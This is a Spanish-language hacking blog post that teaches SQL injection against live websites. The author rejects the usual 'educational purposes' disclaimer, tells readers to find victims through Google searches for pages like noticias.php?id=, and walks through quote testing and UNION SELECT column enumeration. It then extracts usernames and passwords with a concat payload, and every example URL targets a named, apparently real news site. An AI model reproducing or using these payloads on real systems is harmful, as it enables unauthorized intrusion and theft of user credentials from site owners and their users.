Buenas saludos a todo los users que visitan el blog  seguramente ya  me conocen algunos

Soy ShadinessDakr aca les traigo el tutorial SQL INJECTION YA MI BROTH ZERO BITS LO HIZO

PERO POR LO VISTO NO TODOS LO ENTENDIERON EN HACKXCRACK ME PIDIERON

EXPLICACION :)  BUENO ACA SE LAS DOY ... YA POR HAY LES TRAERE MAS TUTORIALES

POR HAY ME PONDRE EN CONTACTO CON UN MEN QUE ME DIJO PARA HACER UN 

VIDEO TUTORIAL DE SUBIR SHELL :D SALUDOS...

Primero que todo no pondre la estupidez que ponen en todo los tutoriales

que empieza este tutorial es con fines educativos -.- ni ellos mismo se la creen ...

Bueno are un ejemplo mas facil para que entiendan bien este tutorial!!! de mi brother Zero Bits

Primero que todo saludos a los hackxCrack
y principalmente a mi team Venezuela [R00t] Team
Je bueno vi que algunas personas no entendieron el tutorial de mi bro se los explicare

Primero que todo busquemos una victima

Yo la buscare alazar...
Vamos a google colocamos noticias.php?id= notas.php?id= videos.php?id= etc...

nos saldran varias paginas en mi caso les pondre una de ejemplo =)

Bueno despues que entren a una de ellas

en mi caso consegui esta
http://www.diariopuerto.com/noticias.php?id=

a lo ultimo para ver si es vulnerable ponemos el '
quedaria asi

http://www.diariopuerto.com/noticias.php?id='

Nos saldra el siguiente error si es vulnerable

si nos sale ese error quitamos el ' y agregamos lo siguiente: 

http://www.diariopuerto.com/noticias.php?id=-1+union+select+0,1,2,3,4,5,6,7,8,9

Asi hasta que nos tire los numeros en mi caso me tiro

les quedaria algo asi como en la imagen :D

a uds les podria tirar 1 2 3 4 5 6 7 etc... jejeje por hay es donde sacaremos el user! y la pass! 

Luego de esto vamos a lo ultimo y colocamos +from+usuarios
o usuario o email emails mails mail etc...

a mi me quedo asi http://www.diariopuerto.com/noticias.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+usuarios

Luego saquemos usuario y pass 

 http://www.diariopuerto.com/noticias.php?id=-1+union+select+usuario,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+usuarios
Se dan cuenta que cambie el 1 por usuario?
Bueno eso lo hago para que me tire el usuario luego se daran cuenta que les saldra el usuario =)

Para sacar la pass quitamos usuario y ponemos lo siguiente 
concat(usuario,0x3a3a,pass)

quedaria asi 

http://www.diariopuerto.com/noticias.php?id=-1+union+select+concat(usuario,0x3a3a,pass),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+usuarios

Si con pass no les agarra intenten con password o clave , contraseña , claves etc....

aca nos dara pass y user :D 

Bueno hay otra forma que es sacando la tabla pero es mas trabajo no?
ejejejejeejejejejejeejejejejejeeje 
bueno la tabla se ve como se saca en el tutorial de mi brother Zero Bits aunque si le sacas
el from no es necesario que saques las tablas =P
Espero haberme explicado bien cualquier cosa me avisan jejejejeje
este tutorial se los hago porque hay algunos que me han dicho que no entienden el de mi brother!!!

Saludos...
Especiales 
a mi team!!!! 
Venezuela [R00t] Team

Zero Bits
Geek Lord
Jeferx
TKDEAD
...........................................................
Otro saludo a los HackxCrack !!!!